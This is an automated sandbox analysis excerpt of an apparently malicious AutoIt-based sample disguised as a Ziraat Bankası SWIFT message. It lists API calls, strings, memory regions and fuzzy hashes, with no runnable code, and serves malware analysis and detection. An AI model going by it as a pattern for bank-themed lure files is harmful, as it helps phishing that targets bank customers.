Instruction Fuzzy Hash: 1A4125F5208245BBDB355BE8FD4ABBE3695F702341F480125FA02D2591CBA49EE0D761

Function 000A3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000A3E79
LoadCursorW.USER32(00000000,00007F00), ref: 000A3E88
LoadIconW.USER32(00000063), ref: 000A3E9E
LoadIconW.USER32(000000A4), ref: 000A3EB0
LoadIconW.USER32(000000A2), ref: 000A3EC2

Part of subcall function 000A4024: LoadImageW.USER32(000A0000,00000063,00000001,00000010,00000010,00000000), ref: 000A4048

RegisterClassExW.USER32(?), ref: 000A3F30

Part of subcall function 000A3F53: GetSysColorBrush.USER32(0000000F), ref: 000A3F86
Part of subcall function 000A3F53: RegisterClassExW.USER32(00000030), ref: 000A3FB0
Part of subcall function 000A3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000A3FC1
Part of subcall function 000A3F53: InitCommonControlsEx.COMCTL32(?), ref: 000A3FDE
Part of subcall function 000A3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000A3FEE
Part of subcall function 000A3F53: LoadIconW.USER32(000000A9), ref: 000A4004
Part of subcall function 000A3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000A4013

Strings

0, xrefs: 000A3F02
AutoIt v3, xrefs: 000A3F1F
#, xrefs: 000A3F09

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 774749e4e1ec0893406aae237c6c8249a965e05d50b6386c8f262241caa0f672
Instruction ID: 57e6acdf83e63fac4b01e430b5c2f12aab7f2fd292bbf8eb0b1249d7f61bd935
Opcode Fuzzy Hash: 774749e4e1ec0893406aae237c6c8249a965e05d50b6386c8f262241caa0f672
Instruction Fuzzy Hash: F2216AB0D00304BFCB10DFA9EC4AA99BFF5FB49315F14422AF204A36A0D3B586909F91

Function 00C05428 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C0546D

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 8c005af0154f7ed5569f506a7e47f592505914adc2421670e2b5dda5f245d30f
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 5F51E676A50608BBEF20DFA0CC49FEF7779AF48701F208554F61AAA1C0DA749A44DF60

Function 000A49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000A4A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001141DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0011421A
RegCloseKey.ADVAPI32(?), ref: 00114249

Strings

Software\AutoIt v3\AutoIt, xrefs: 000A4A13
Include, xrefs: 001141D3, 00114212

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 544a0463fedad8df50a869857ac30825f27afa69f22a053225bde442c61c7ede
Instruction ID: 6d17e70909dbdf970286367d5bcad45d966c91fc0d0f9446dafea7372d1537e4
Opcode Fuzzy Hash: 544a0463fedad8df50a869857ac30825f27afa69f22a053225bde442c61c7ede
Instruction Fuzzy Hash: 1C117F75600108BFEB14ABA4ED86DFF7BBCEF05754F000068B506D21A2EB70AE42DB54

Function 000A36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000A36E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000A3707
ShowWindow.USER32(00000000,?,?,?,?,000A3AA3,?), ref: 000A371B
ShowWindow.USER32(00000000,?,?,?,?,000A3AA3,?), ref: 000A3724

Strings

edit, xrefs: 000A3701
AutoIt v3, xrefs: 000A36DE, 000A36E3, 000A36E4

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3204eb4ce25a8b6406f5e37f2bc9d4e4a7367309b77e2958a74b4a6391e54e66
Instruction ID: 8590a44d925788619528af291f61d233d2afc555a3a686ab9dbf9d4fdab9a9fa
Opcode Fuzzy Hash: 3204eb4ce25a8b6406f5e37f2bc9d4e4a7367309b77e2958a74b4a6391e54e66
Instruction Fuzzy Hash: 9CF0DA755402D07AEB315B57BC08E673E7DE7C6F24F04001AFA04A25A0C6A508D5EAB0

Function 000A4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000A41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000A39FE,?,00000001), ref: 000A41DB

_free.LIBCMT ref: 001136B7
_free.LIBCMT ref: 001136FE

Part of subcall function 000AC833: __wsplitpath.LIBCMT ref: 000AC93E
Part of subcall function 000AC833: _wcscpy.LIBCMT ref: 000AC953
Part of subcall function 000AC833: _wcscat.LIBCMT ref: 000AC968
Part of subcall function 000AC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000AC978

Strings

Bad directive syntax error, xrefs: 001136E4
>>>AUTOIT SCRIPT<<<, xrefs: 00113491

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 77d1ae02822841264b86d0f8ae0eca0cf796c4a3b1ca1e390825b7ecc3ec505f
Instruction ID: ec91bab0375ece3fe10911f7f03ed6f5448b14cece880f02e64b3e6c1491d9dc
Opcode Fuzzy Hash: 77d1ae02822841264b86d0f8ae0eca0cf796c4a3b1ca1e390825b7ecc3ec505f
Instruction Fuzzy Hash: 4A918371910259EFCF08EFE5CC919EEB7B4BF19310F10442AF426AB296EB749A45CB50

Function 00C06EE8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C06DD8: Sleep.KERNELBASE(000001F4), ref: 00C06DE9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C07021

Strings

0OZPJRL3F4L7KV2CSGR1D0, xrefs: 00C070A1, 00C070A4

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFileSleep
String ID: 0OZPJRL3F4L7KV2CSGR1D0
API String ID: 2694422964-2252573909
Opcode ID: f4787c75ae18d096f4df60446ef90188be4724608a52fe1d5f4bfaada05f9399
Instruction ID: 44ee26ea51b2e2da5169b3fc3a21f8107c05c01b45c7ef045abb691db16777cf
Opcode Fuzzy Hash: f4787c75ae18d096f4df60446ef90188be4724608a52fe1d5f4bfaada05f9399
Instruction Fuzzy Hash: 1A618231D04258DBEF15DBB4C854BEFBB79AF19304F104298E2487B2C1D6B91B45CBA5

Function 000A4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000A5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00161148,?,000A61FF,?,00000000,00000001,00000000), ref: 000A5392

Part of subcall function 000A49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000A4A1D

_wcscat.LIBCMT ref: 00112D80
_wcscat.LIBCMT ref: 00112DB5

Strings

\, xrefs: 00112DA2
\Include\, xrefs: 000A4B0A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: a0a2810537fa0cbd562ecdf6963acc6e9d931527a39596ad633f81180013fa7c
Instruction ID: 4000a8c8876ef219913d86cc65f69ae3172377343dc4a0c971a086af7729c053
Opcode Fuzzy Hash: a0a2810537fa0cbd562ecdf6963acc6e9d931527a39596ad633f81180013fa7c
Instruction Fuzzy Hash: 6451B3B14197408FC704EF95ED818DAB7F4FF5B300B84452EF644936A2EBB09688CB52

Function 000C34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 000C34FE

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 000C3539
__wopenfile.LIBCMT ref: 000C3549

Strings

<G, xrefs: 000C34CD, 000C34F0, 000C34FC

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 18c255ac8274752ae09b7599bf0e47f0d23be2cafe5036f85d31817db200041a
Instruction ID: f432b07cdc62b3d0f28c68cf8b36ccc90be978c04a0fc6dffda62c5efe57138d
Opcode Fuzzy Hash: 18c255ac8274752ae09b7599bf0e47f0d23be2cafe5036f85d31817db200041a
Instruction Fuzzy Hash: 97110A70A10206DBDB65BF70DC42FAE36E4AF05350B14C52DF819CB283EB34CA019BA1

Function 000BD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000BD28B,SwapMouseButtons,00000004,?), ref: 000BD2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000BD28B,SwapMouseButtons,00000004,?,?,?,?,000BC865), ref: 000BD2DD
RegCloseKey.KERNELBASE(00000000,?,?,000BD28B,SwapMouseButtons,00000004,?,?,?,?,000BC865), ref: 000BD2FF

Strings

Control Panel\Mouse, xrefs: 000BD2BA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 57e735a946e4bf67f8f0ee4cbb4fa772c79745eeb3f5fffb2f7b01c07e269729
Instruction ID: bca4318349c3411ed0f23cf51fc9750af04269ec1486eecde9d8e1e5323653d1
Opcode Fuzzy Hash: 57e735a946e4bf67f8f0ee4cbb4fa772c79745eeb3f5fffb2f7b01c07e269729
Instruction Fuzzy Hash: 41113C75611208BFDB208F64DC84EEFBBF8EF44744F10446AF805E7120E6319E419B64

Function 000BEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000BEBB2

Part of subcall function 000A51AF: _memset.LIBCMT ref: 000A522F
Part of subcall function 000A51AF: _wcscpy.LIBCMT ref: 000A5283
Part of subcall function 000A51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000A5293

KillTimer.USER32(?,00000001,?,?), ref: 000BEC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000BEC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00113C88

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f273a6bb07b31f1a121c3a05b4a43c6f65cab7b13d63246c547de949e6e4a3b4
Instruction ID: 4a1b5651df1cb3afd0df6de02e25b81de9428626e7a05e9460194e0e573b720a
Opcode Fuzzy Hash: f273a6bb07b31f1a121c3a05b4a43c6f65cab7b13d63246c547de949e6e4a3b4
Instruction Fuzzy Hash: B421D770504784AFE7379B28DC55BEBFFEC9B01308F04049EE69A66246C3742AC5CB51

Function 000A40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00113725
GetOpenFileNameW.COMDLG32 ref: 0011376F

Part of subcall function 000A660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000A53B1,?,?,000A61FF,?,00000000,00000001,00000000), ref: 000A662F

Part of subcall function 000A40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000A40C6

Strings

X, xrefs: 0011373E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 965fb4d87433cc09abeaee9619bf943845b58df3bb31b0c86b4de8772a2b74ef
Instruction ID: 4a98d19ab759da8fbbdd923e9cd39f28d9e7c4ce5f89e7f4e6ef9d38329d0090
Opcode Fuzzy Hash: 965fb4d87433cc09abeaee9619bf943845b58df3bb31b0c86b4de8772a2b74ef
Instruction Fuzzy Hash: B021C371A00288ABCF51DFD4C845BEEBBF8AF89300F004069E415AB242DBF45A898F65

Function 00C05B08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00C05B4D
ExitProcess.KERNEL32(00000000), ref: 00C05B6C

Strings

D, xrefs: 00C05B19

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction ID: 6fc057157efada16a15f82f56ecc6bb2b9619efd25731afd3ce8a1fbf0232be7
Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction Fuzzy Hash: C6F0EC7194424CABDB64EFE0CC49FEE777CBF04701F548509FA1A9A1C4DA74A608DB61

Function 000EC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 000EC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000EC746

Strings

aut, xrefs: 000EC740

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 854017ace4dd1a522ffb25731bf1273bab3e474553bdad3fbcee6553daf6dc95
Instruction ID: 6cac12fe8327fee674ec1662329338cc9783aa9ab93114e5b61847dc6ab2ac50
Opcode Fuzzy Hash: 854017ace4dd1a522ffb25731bf1273bab3e474553bdad3fbcee6553daf6dc95
Instruction Fuzzy Hash: 70D05E7150030EFBDB60AB90EC0EF8A776C9700708F0001A07660A50B1DBB0E6EA8B54

Function 000FF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108ef9c4856496866ac00816065d1f711c91c495bfa2cc28c619763e1ecb660c
Instruction ID: 493739de756fa36ede0f95393906dc2b303e0417984258b46fc67d39cded2702
Opcode Fuzzy Hash: 108ef9c4856496866ac00816065d1f711c91c495bfa2cc28c619763e1ecb660c
Instruction Fuzzy Hash: 15F17B716083469FC710DF24C881BAEB7E5FF88314F14892EF9959B292DB71E905CB82

Function 000C395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 000C3973

Part of subcall function 000C81C2: __NMSG_WRITE.LIBCMT ref: 000C81E9
Part of subcall function 000C81C2: __NMSG_WRITE.LIBCMT ref: 000C81F3

__NMSG_WRITE.LIBCMT ref: 000C397A

Part of subcall function 000C821F: GetModuleFileNameW.KERNEL32(00000000,00160312,00000104,00000000,00000001,00000000), ref: 000C82B1
Part of subcall function 000C821F: ___crtMessageBoxW.LIBCMT ref: 000C835F

Part of subcall function 000C1145: ___crtCorExitProcess.LIBCMT ref: 000C114B
Part of subcall function 000C1145: ExitProcess.KERNEL32 ref: 000C1154

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,000BF507,?,0000000E), ref: 000C399F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3000f1691d0666508e08d567b4355814f1cfebe8dfcc7605a583af7090edd228
Instruction ID: 7c19c84451dbb655c81552d7b83d945e0081f22c4ef5143d273781dfc12231cc
Opcode Fuzzy Hash: 3000f1691d0666508e08d567b4355814f1cfebe8dfcc7605a583af7090edd228
Instruction Fuzzy Hash: F001B5313953019AE6663B24EC46FAE7398DB82764F21902DF5099B693DFF09D408AA0

Function 000EC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000EC385,?,?,?,?,?,00000004), ref: 000EC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000EC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000EC708
CloseHandle.KERNEL32(00000000,?,000EC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000EC70F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 69bff7bbf4d88561dd31bb2f372daa2e3511da4dcf6c6b507158ba57cdf8f14a
Instruction ID: 33506971c4e411bd6a81a8194f24f2e1027e87cbcb0837c83900739454c42cdd
Opcode Fuzzy Hash: 69bff7bbf4d88561dd31bb2f372daa2e3511da4dcf6c6b507158ba57cdf8f14a
Instruction Fuzzy Hash: F3E08632141214BBE7311B54FC0AFCA7B58AB05761F104110FB54794E097B225728799

Function 000EBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000EBB72

Part of subcall function 000C1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000C7A85), ref: 000C1CB1
Part of subcall function 000C1C9D: GetLastError.KERNEL32(00000000,?,000C7A85), ref: 000C1CC3

_free.LIBCMT ref: 000EBB83
_free.LIBCMT ref: 000EBB95

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
